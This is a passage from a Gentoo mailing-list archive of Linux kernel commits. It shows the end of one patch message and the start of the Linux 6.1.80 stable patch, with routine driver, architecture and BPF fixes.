+ 	SND_PCI_QUIRK(0x103c, 0x8973, "HP EliteBook 860 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8974, "HP EliteBook 840 Aero G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8975, "HP EliteBook x360 840 Aero G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x897d, "HP mt440 Mobile Thin Client U74", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8981, "HP Elite Dragonfly G3", ALC245_FIXUP_CS35L41_SPI_4),
+ 	SND_PCI_QUIRK(0x103c, 0x898e, "HP EliteBook 835 G9", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x103c, 0x898f, "HP EliteBook 835 G9", ALC287_FIXUP_CS35L41_I2C_2),
+@@ -9687,11 +9688,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa8, "HP EliteBook 640 G9 (MB 8AA6)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aab, "HP EliteBook 650 G9 (MB 8AA9)", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ab9, "HP EliteBook 840 G8 (MB 8AB8)", ALC285_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b0f, "HP Elite mt645 G7 Mobile Thin Client U81", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
++	SND_PCI_QUIRK(0x103c, 0x8b3f, "HP mt440 Mobile Thin Client U91", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 201dc77ebbd77..d5d2183730b9f 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -3109,6 +3109,10 @@ union bpf_attr {
+  *		**BPF_FIB_LOOKUP_DIRECT**
+  *			Do a direct table lookup vs full lookup using FIB
+  *			rules.
++ *		**BPF_FIB_LOOKUP_TBID**
++ *			Used with BPF_FIB_LOOKUP_DIRECT.
++ *			Use the routing table ID present in *params*->tbid
++ *			for the fib lookup.
+  *		**BPF_FIB_LOOKUP_OUTPUT**
+  *			Perform lookup from an egress perspective (default is
+  *			ingress).
+@@ -3117,6 +3121,11 @@ union bpf_attr {
+  *			and *params*->smac will not be set as output. A common
+  *			use case is to call **bpf_redirect_neigh**\ () after
+  *			doing **bpf_fib_lookup**\ ().
++ *		**BPF_FIB_LOOKUP_SRC**
++ *			Derive and set source IP addr in *params*->ipv{4,6}_src
++ *			for the nexthop. If the src addr cannot be derived,
++ *			**BPF_FIB_LKUP_RET_NO_SRC_ADDR** is returned. In this
++ *			case, *params*->dmac and *params*->smac are not set either.
+  *
+  *		*ctx* is either **struct xdp_md** for XDP programs or
+  *		**struct sk_buff** tc cls_act programs.
+@@ -6687,6 +6696,8 @@ enum {
+ 	BPF_FIB_LOOKUP_DIRECT  = (1U << 0),
+ 	BPF_FIB_LOOKUP_OUTPUT  = (1U << 1),
+ 	BPF_FIB_LOOKUP_SKIP_NEIGH = (1U << 2),
++	BPF_FIB_LOOKUP_TBID    = (1U << 3),
++	BPF_FIB_LOOKUP_SRC     = (1U << 4),
+ };
+ 
+ enum {
+@@ -6699,6 +6710,7 @@ enum {
+ 	BPF_FIB_LKUP_RET_UNSUPP_LWT,   /* fwd requires encapsulation */
+ 	BPF_FIB_LKUP_RET_NO_NEIGH,     /* no neighbor entry for nh */
+ 	BPF_FIB_LKUP_RET_FRAG_NEEDED,  /* fragmentation required to fwd */
++	BPF_FIB_LKUP_RET_NO_SRC_ADDR,  /* failed to derive IP src addr */
+ };
+ 
+ struct bpf_fib_lookup {
+@@ -6733,6 +6745,9 @@ struct bpf_fib_lookup {
+ 		__u32	rt_metric;
+ 	};
+ 
++	/* input: source address to consider for lookup
++	 * output: source address result from lookup
++	 */
+ 	union {
+ 		__be32		ipv4_src;
+ 		__u32		ipv6_src[4];  /* in6_addr; network order */
+@@ -6747,9 +6762,19 @@ struct bpf_fib_lookup {
+ 		__u32		ipv6_dst[4];  /* in6_addr; network order */
+ 	};
+ 
+-	/* output */
+-	__be16	h_vlan_proto;
+-	__be16	h_vlan_TCI;
++	union {
++		struct {
++			/* output */
++			__be16	h_vlan_proto;
++			__be16	h_vlan_TCI;
++		};
++		/* input: when accompanied with the
++		 * 'BPF_FIB_LOOKUP_DIRECT | BPF_FIB_LOOKUP_TBID` flags, a
++		 * specific routing table to use for the fib lookup.
++		 */
++		__u32	tbid;
++	};
++
+ 	__u8	smac[6];     /* ETH_ALEN */
+ 	__u8	dmac[6];     /* ETH_ALEN */
+ };
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 2107579e2939d..a20dca9d26d68 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -144,6 +144,11 @@ check_tools()
+ 		exit $ksft_skip
+ 	fi
+ 
++	if ! ss -h | grep -q MPTCP; then
++		echo "SKIP: ss tool does not support MPTCP"
++		exit $ksft_skip
++	fi
++
+ 	# Use the legacy version if available to support old kernel versions
+ 	if iptables-legacy -V &> /dev/null; then
+ 		iptables="iptables-legacy"


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-01 13:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-01 13:07 UTC (permalink / raw
  To: gentoo-commits

commit:     71256151e575b088f3b4e9a57dbdd4e58478012c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  1 13:07:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  1 13:07:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=71256151

Linux patch 6.1.80

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1079_linux-6.1.80.patch | 10484 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10488 insertions(+)

diff --git a/0000_README b/0000_README
index 4d09930e..0bde520b 100644
--- a/0000_README
+++ b/0000_README
@@ -359,6 +359,10 @@ Patch:  1078_linux-6.1.79.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.79
 
+Patch:  1079_linux-6.1.80.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.80
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1079_linux-6.1.80.patch b/1079_linux-6.1.80.patch
new file mode 100644
index 00000000..33a573eb
--- /dev/null
+++ b/1079_linux-6.1.80.patch
@@ -0,0 +1,10484 @@
+diff --git a/Makefile b/Makefile
+index d6bc9f597e8b8..bc4adb561a7cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 79
++SUBLEVEL = 80
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-ep93xx/core.c b/arch/arm/mach-ep93xx/core.c
+index 95e731676cea4..961daac653261 100644
+--- a/arch/arm/mach-ep93xx/core.c
++++ b/arch/arm/mach-ep93xx/core.c
+@@ -339,6 +339,7 @@ static struct gpiod_lookup_table ep93xx_i2c_gpiod_table = {
+ 				GPIO_ACTIVE_HIGH | GPIO_OPEN_DRAIN),
+ 		GPIO_LOOKUP_IDX("G", 0, NULL, 1,
+ 				GPIO_ACTIVE_HIGH | GPIO_OPEN_DRAIN),
++		{ }
+ 	},
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/px30.dtsi b/arch/arm64/boot/dts/rockchip/px30.dtsi
+index bfa3580429d10..61f0186447dad 100644
+--- a/arch/arm64/boot/dts/rockchip/px30.dtsi
++++ b/arch/arm64/boot/dts/rockchip/px30.dtsi
+@@ -607,6 +607,7 @@ spi0: spi@ff1d0000 {
+ 		clock-names = "spiclk", "apb_pclk";
+ 		dmas = <&dmac 12>, <&dmac 13>;
+ 		dma-names = "tx", "rx";
++		num-cs = <2>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spi0_clk &spi0_csn &spi0_miso &spi0_mosi>;
+ 		#address-cells = <1>;
+@@ -622,6 +623,7 @@ spi1: spi@ff1d8000 {
+ 		clock-names = "spiclk", "apb_pclk";
+ 		dmas = <&dmac 14>, <&dmac 15>;
+ 		dma-names = "tx", "rx";
++		num-cs = <2>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spi1_clk &spi1_csn0 &spi1_csn1 &spi1_miso &spi1_mosi>;
+ 		#address-cells = <1>;
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index d720b6f7e5f9c..da18413712c04 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -343,6 +343,7 @@ extern void sme_alloc(struct task_struct *task, bool flush);
+ extern unsigned int sme_get_vl(void);
+ extern int sme_set_current_vl(unsigned long arg);
+ extern int sme_get_current_vl(void);
++extern void sme_suspend_exit(void);
+ 
+ /*
+  * Return how many bytes of memory are required to store the full SME
+@@ -372,6 +373,7 @@ static inline int sme_max_vl(void) { return 0; }
+ static inline int sme_max_virtualisable_vl(void) { return 0; }
+ static inline int sme_set_current_vl(unsigned long arg) { return -EINVAL; }
+ static inline int sme_get_current_vl(void) { return -EINVAL; }
++static inline void sme_suspend_exit(void) { }
+ 
+ static inline size_t za_state_size(struct task_struct const *task)
+ {
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 8c226d79abdfc..59b5a16bab5d6 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -1347,6 +1347,20 @@ void __init sme_setup(void)
+ 		get_sme_default_vl());
+ }
+ 
++void sme_suspend_exit(void)
++{
++	u64 smcr = 0;
++
++	if (!system_supports_sme())
++		return;
++
++	if (system_supports_fa64())
++		smcr |= SMCR_ELx_FA64;
++
++	write_sysreg_s(smcr, SYS_SMCR_EL1);
++	write_sysreg_s(0, SYS_SMPRI_EL1);
++}
++
+ #endif /* CONFIG_ARM64_SME */
+ 
+ static void sve_init_regs(void)
+diff --git a/arch/arm64/kernel/suspend.c b/arch/arm64/kernel/suspend.c
+index 8b02d310838f9..064d996cc55b2 100644
+--- a/arch/arm64/kernel/suspend.c
++++ b/arch/arm64/kernel/suspend.c
+@@ -11,6 +11,7 @@
+ #include <asm/daifflags.h>
+ #include <asm/debug-monitors.h>
+ #include <asm/exec.h>
++#include <asm/fpsimd.h>
+ #include <asm/mte.h>
+ #include <asm/memory.h>
+ #include <asm/mmu_context.h>
+@@ -77,6 +78,8 @@ void notrace __cpu_suspend_exit(void)
+ 	 */
+ 	spectre_v4_enable_mitigation(NULL);
+ 
++	sme_suspend_exit();
++
+ 	/* Restore additional feature-specific configuration */
+ 	ptrauth_suspend_exit();
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 3c344e4cd4cad..092327665a6ef 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -462,6 +462,9 @@ static int its_sync_lpi_pending_table(struct kvm_vcpu *vcpu)
+ 		}
+ 
+ 		irq = vgic_get_irq(vcpu->kvm, NULL, intids[i]);
++		if (!irq)
++			continue;
++
+ 		raw_spin_lock_irqsave(&irq->irq_lock, flags);
+ 		irq->pending_latch = pendmask & (1U << bit_nr);
+ 		vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
+@@ -1427,6 +1430,8 @@ static int vgic_its_cmd_handle_movall(struct kvm *kvm, struct vgic_its *its,
+ 
+ 	for (i = 0; i < irq_count; i++) {
+ 		irq = vgic_get_irq(kvm, NULL, intids[i]);
++		if (!irq)
++			continue;
+ 
+ 		update_affinity(irq, vcpu2);
+ 
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index e737dc8cd660c..fa3171f563274 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -9,6 +9,7 @@ config LOONGARCH
+ 	select ARCH_BINFMT_ELF_STATE
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
++	select ARCH_ENABLE_THP_MIGRATION if TRANSPARENT_HUGEPAGE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+@@ -80,6 +81,7 @@ config LOONGARCH
+ 	select GPIOLIB
+ 	select HAVE_ARCH_AUDITSYSCALL
+ 	select HAVE_ARCH_MMAP_RND_BITS if MMU
++	select HAVE_ARCH_SECCOMP
+ 	select HAVE_ARCH_SECCOMP_FILTER
+ 	select HAVE_ARCH_TRACEHOOK
+ 	select HAVE_ARCH_TRANSPARENT_HUGEPAGE
+@@ -461,23 +463,6 @@ config PHYSICAL_START
+ 	  specified in the "crashkernel=YM@XM" command line boot parameter
+ 	  passed to the panic-ed kernel).
+ 
+-config SECCOMP
+-	bool "Enable seccomp to safely compute untrusted bytecode"
+-	depends on PROC_FS
+-	default y
+-	help
+-	  This kernel feature is useful for number crunching applications
+-	  that may need to compute untrusted bytecode during their
+-	  execution. By using pipes or other transports made available to
+-	  the process as file descriptors supporting the read/write
+-	  syscalls, it's possible to isolate those applications in
+-	  their own address space using seccomp. Once seccomp is
+-	  enabled via /proc/<pid>/seccomp, it cannot be disabled
+-	  and the task is only allowed to execute a few safe syscalls
+-	  defined by each seccomp mode.
+-
+-	  If unsure, say Y. Only embedded should say N here.
+-
+ endmenu
+ 
+ config ARCH_SELECT_MEMORY_MODEL
+@@ -495,10 +480,6 @@ config ARCH_SPARSEMEM_ENABLE
+ 	  or have huge holes in the physical address space for other reasons.
+ 	  See <file:Documentation/mm/numa.rst> for more.
+ 
+-config ARCH_ENABLE_THP_MIGRATION
+-	def_bool y
+-	depends on TRANSPARENT_HUGEPAGE
+-
+ config ARCH_MEMORY_PROBE
+ 	def_bool y
+ 	depends on MEMORY_HOTPLUG
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index e0404df2c952f..18a2b37f4aea3 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -297,6 +297,7 @@ void play_dead(void)
+ 		addr = iocsr_read64(LOONGARCH_IOCSR_MBUF0);
+ 	} while (addr == 0);
+ 
++	local_irq_disable();
+ 	init_fn = (void *)TO_CACHE(addr);
+ 	iocsr_write32(0xffffffff, LOONGARCH_IOCSR_IPI_CLEAR);
+ 
+diff --git a/arch/mips/kernel/traps.c b/arch/mips/kernel/traps.c
+index 246c6a6b02614..5b778995d4483 100644
+--- a/arch/mips/kernel/traps.c
++++ b/arch/mips/kernel/traps.c
+@@ -2007,7 +2007,13 @@ unsigned long vi_handlers[64];
+ 
+ void reserve_exception_space(phys_addr_t addr, unsigned long size)
+ {
+-	memblock_reserve(addr, size);
++	/*
++	 * reserve exception space on CPUs other than CPU0
++	 * is too late, since memblock is unavailable when APs
++	 * up
++	 */
++	if (smp_processor_id() == 0)
++		memblock_reserve(addr, size);
+ }
+ 
+ void __init *set_except_vector(int n, void *addr)
+diff --git a/arch/parisc/kernel/processor.c b/arch/parisc/kernel/processor.c
+index 1f6c776d80813..c67883487ecd3 100644
+--- a/arch/parisc/kernel/processor.c
++++ b/arch/parisc/kernel/processor.c
+@@ -171,7 +171,6 @@ static int __init processor_probe(struct parisc_device *dev)
+ 	p->cpu_num = cpu_info.cpu_num;
+ 	p->cpu_loc = cpu_info.cpu_loc;
+ 
+-	set_cpu_possible(cpuid, true);
+ 	store_cpu_topology(cpuid);
+ 
+ #ifdef CONFIG_SMP
+@@ -466,13 +465,6 @@ static struct parisc_driver cpu_driver __refdata = {
+  */
+ void __init processor_init(void)
+ {
+-	unsigned int cpu;
+-
+ 	reset_cpu_topology();
+-
+-	/* reset possible mask. We will mark those which are possible. */
+-	for_each_possible_cpu(cpu)
+-		set_cpu_possible(cpu, false);
+-
+ 	register_parisc_driver(&cpu_driver);
+ }
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index 2c99f9552b2f5..394c69fda399e 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -241,7 +241,7 @@ resource_size_t pcibios_align_resource(void *data, const struct resource *res,
+ /* combine single writes by using store-block insn */
+ void __iowrite64_copy(void __iomem *to, const void *from, size_t count)
+ {
+-       zpci_memcpy_toio(to, from, count);
++	zpci_memcpy_toio(to, from, count * 8);
+ }
+ 
+ static void __iomem *__ioremap(phys_addr_t addr, size_t size, pgprot_t prot)
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 2f123d4fb85b5..d3706de91a934 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -222,6 +222,8 @@ extern void srso_alias_untrain_ret(void);
+ extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
++extern void (*x86_return_thunk)(void);
++
+ #ifdef CONFIG_RETPOLINE
+ 
+ #define GEN(reg) \
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 6b8c93989aa31..69f85e2746119 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -536,6 +536,7 @@ void __init_or_module noinline apply_retpolines(s32 *start, s32 *end)
+ }
+ 
+ #ifdef CONFIG_RETHUNK
++
+ /*
+  * Rewrite the compiler generated return thunk tail-calls.
+  *
+@@ -551,14 +552,18 @@ static int patch_return(void *addr, struct insn *insn, u8 *bytes)
+ {
+ 	int i = 0;
+ 
+-	if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-		return -1;
++	if (cpu_feature_enabled(X86_FEATURE_RETHUNK)) {
++		if (x86_return_thunk == __x86_return_thunk)
++			return -1;
+ 
+-	bytes[i++] = RET_INSN_OPCODE;
++		i = JMP32_INSN_SIZE;
++		__text_gen_insn(bytes, JMP32_INSN_OPCODE, addr, x86_return_thunk, i);
++	} else {
++		bytes[i++] = RET_INSN_OPCODE;
++	}
+ 
+ 	for (; i < insn->length;)
+ 		bytes[i++] = INT3_INSN_OPCODE;
+-
+ 	return i;
+ }
+ 
+diff --git a/arch/x86/kernel/ftrace.c b/arch/x86/kernel/ftrace.c
+index e07234ec7e237..ec51ce713dea4 100644
+--- a/arch/x86/kernel/ftrace.c
++++ b/arch/x86/kernel/ftrace.c
+@@ -361,7 +361,7 @@ create_trampoline(struct ftrace_ops *ops, unsigned int *tramp_size)
+ 
+ 	ip = trampoline + size;
+ 	if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-		__text_gen_insn(ip, JMP32_INSN_OPCODE, ip, &__x86_return_thunk, JMP32_INSN_SIZE);
++		__text_gen_insn(ip, JMP32_INSN_OPCODE, ip, x86_return_thunk, JMP32_INSN_SIZE);
+ 	else
+ 		memcpy(ip, retq, sizeof(retq));
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 3fbb491688275..b32134b093ec8 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -80,7 +80,7 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 
+ 	case RET:
+ 		if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
+-			code = text_gen_insn(JMP32_INSN_OPCODE, insn, &__x86_return_thunk);
++			code = text_gen_insn(JMP32_INSN_OPCODE, insn, x86_return_thunk);
+ 		else
+ 			code = &retinsn;
+ 		break;
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index aa39d678fe81d..dae5c952735c7 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -961,7 +961,7 @@ static int __init cmp_memblk(const void *a, const void *b)
+ 	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
+ 	const struct numa_memblk *mb = *(const struct numa_memblk **)b;
+ 
+-	return ma->start - mb->start;
++	return (ma->start > mb->start) - (ma->start < mb->start);
+ }
+ 
+ static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
+@@ -971,14 +971,12 @@ static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
+  * @start: address to begin fill
+  * @end: address to end fill
+  *
+- * Find and extend numa_meminfo memblks to cover the @start-@end
+- * physical address range, such that the first memblk includes
+- * @start, the last memblk includes @end, and any gaps in between
+- * are filled.
++ * Find and extend numa_meminfo memblks to cover the physical
++ * address range @start-@end
+  *
+  * RETURNS:
+  * 0		  : Success
+- * NUMA_NO_MEMBLK : No memblk exists in @start-@end range
++ * NUMA_NO_MEMBLK : No memblks exist in address range @start-@end
+  */
+ 
+ int __init numa_fill_memblks(u64 start, u64 end)
+@@ -990,17 +988,14 @@ int __init numa_fill_memblks(u64 start, u64 end)
+ 
+ 	/*
+ 	 * Create a list of pointers to numa_meminfo memblks that
+-	 * overlap start, end. Exclude (start == bi->end) since
+-	 * end addresses in both a CFMWS range and a memblk range
+-	 * are exclusive.
+-	 *
+-	 * This list of pointers is used to make in-place changes
+-	 * that fill out the numa_meminfo memblks.
++	 * overlap start, end. The list is used to make in-place
++	 * changes that fill out the numa_meminfo memblks.
+ 	 */
+ 	for (int i = 0; i < mi->nr_blks; i++) {
+ 		struct numa_memblk *bi = &mi->blk[i];
+ 
+-		if (start < bi->end && end >= bi->start) {
++		if (memblock_addrs_overlap(start, end - start, bi->start,
++					   bi->end - bi->start)) {
+ 			blk[count] = &mi->blk[i];
+ 			count++;
+ 		}
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index b69aee6245e4a..7913440c0fd46 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -432,7 +432,7 @@ static void emit_return(u8 **pprog, u8 *ip)
+ 	u8 *prog = *pprog;
+ 
+ 	if (cpu_feature_enabled(X86_FEATURE_RETHUNK)) {
+-		emit_jump(&prog, &__x86_return_thunk, ip);
++		emit_jump(&prog, x86_return_thunk, ip);
+ 	} else {
+ 		EMIT1(0xC3);		/* ret */
+ 		if (IS_ENABLED(CONFIG_SLS))
+diff --git a/block/blk-map.c b/block/blk-map.c
+index 66da9e2b19abf..b337ae347bfa3 100644
+--- a/block/blk-map.c
++++ b/block/blk-map.c
+@@ -203,12 +203,19 @@ static int bio_copy_user_iov(struct request *rq, struct rq_map_data *map_data,
+ 	/*
+ 	 * success
+ 	 */
+-	if ((iov_iter_rw(iter) == WRITE &&
+-	     (!map_data || !map_data->null_mapped)) ||
+-	    (map_data && map_data->from_user)) {
++	if (iov_iter_rw(iter) == WRITE &&
++	     (!map_data || !map_data->null_mapped)) {
+ 		ret = bio_copy_from_iter(bio, iter);
+ 		if (ret)
+ 			goto cleanup;
++	} else if (map_data && map_data->from_user) {
++		struct iov_iter iter2 = *iter;
++
++		/* This is the copy-in part of SG_DXFER_TO_FROM_DEV. */
++		iter2.data_source = ITER_SOURCE;
++		ret = bio_copy_from_iter(bio, &iter2);
++		if (ret)
++			goto cleanup;
+ 	} else {
+ 		if (bmd->is_our_pages)
+ 			zero_fill_bio(bio);
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 805645efb3ccf..1790a2ecb9fac 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -49,6 +49,7 @@ enum {
+ enum board_ids {
+ 	/* board IDs by feature in alphabetical order */
+ 	board_ahci,
++	board_ahci_43bit_dma,
+ 	board_ahci_ign_iferr,
+ 	board_ahci_low_power,
+ 	board_ahci_no_debounce_delay,
+@@ -129,6 +130,13 @@ static const struct ata_port_info ahci_port_info[] = {
+ 		.udma_mask	= ATA_UDMA6,
+ 		.port_ops	= &ahci_ops,
+ 	},
++	[board_ahci_43bit_dma] = {
++		AHCI_HFLAGS	(AHCI_HFLAG_43BIT_ONLY),
++		.flags		= AHCI_FLAG_COMMON,
++		.pio_mask	= ATA_PIO4,
++		.udma_mask	= ATA_UDMA6,
++		.port_ops	= &ahci_ops,
++	},
+ 	[board_ahci_ign_iferr] = {
+ 		AHCI_HFLAGS	(AHCI_HFLAG_IGN_IRQ_IF_ERR),
+ 		.flags		= AHCI_FLAG_COMMON,
+@@ -597,14 +605,19 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(PROMISE, 0x3f20), board_ahci },	/* PDC42819 */
+ 	{ PCI_VDEVICE(PROMISE, 0x3781), board_ahci },   /* FastTrak TX8660 ahci-mode */
+ 
+-	/* Asmedia */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0601), board_ahci },	/* ASM1060 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0602), board_ahci },	/* ASM1060 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0611), board_ahci },	/* ASM1061 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0612), board_ahci },	/* ASM1062 */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0621), board_ahci },   /* ASM1061R */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0622), board_ahci },   /* ASM1062R */
+-	{ PCI_VDEVICE(ASMEDIA, 0x0624), board_ahci },   /* ASM1062+JMB575 */
++	/* ASMedia */
++	{ PCI_VDEVICE(ASMEDIA, 0x0601), board_ahci_43bit_dma },	/* ASM1060 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0602), board_ahci_43bit_dma },	/* ASM1060 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0611), board_ahci_43bit_dma },	/* ASM1061 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0612), board_ahci_43bit_dma },	/* ASM1061/1062 */
++	{ PCI_VDEVICE(ASMEDIA, 0x0621), board_ahci_43bit_dma },	/* ASM1061R */
++	{ PCI_VDEVICE(ASMEDIA, 0x0622), board_ahci_43bit_dma },	/* ASM1062R */
++	{ PCI_VDEVICE(ASMEDIA, 0x0624), board_ahci_43bit_dma },	/* ASM1062+JMB575 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1062), board_ahci },	/* ASM1062A */
++	{ PCI_VDEVICE(ASMEDIA, 0x1064), board_ahci },	/* ASM1064 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1164), board_ahci },   /* ASM1164 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1165), board_ahci },   /* ASM1165 */
++	{ PCI_VDEVICE(ASMEDIA, 0x1166), board_ahci },   /* ASM1166 */
+ 
+ 	/*
+ 	 * Samsung SSDs found on some macbooks.  NCQ times out if MSI is
+@@ -658,6 +671,11 @@ MODULE_PARM_DESC(mobile_lpm_policy, "Default LPM policy for mobile chipsets");
+ static void ahci_pci_save_initial_config(struct pci_dev *pdev,
+ 					 struct ahci_host_priv *hpriv)
+ {
++	if (pdev->vendor == PCI_VENDOR_ID_ASMEDIA && pdev->device == 0x1166) {
++		dev_info(&pdev->dev, "ASM1166 has only six ports\n");
++		hpriv->saved_port_map = 0x3f;
++	}
++
+ 	if (pdev->vendor == PCI_VENDOR_ID_JMICRON && pdev->device == 0x2361) {
+ 		dev_info(&pdev->dev, "JMB361 has only one port\n");
+ 		hpriv->saved_port_map = 1;
+@@ -944,11 +962,20 @@ static int ahci_pci_device_resume(struct device *dev)
+ 
+ #endif /* CONFIG_PM */
+ 
+-static int ahci_configure_dma_masks(struct pci_dev *pdev, int using_dac)
++static int ahci_configure_dma_masks(struct pci_dev *pdev,
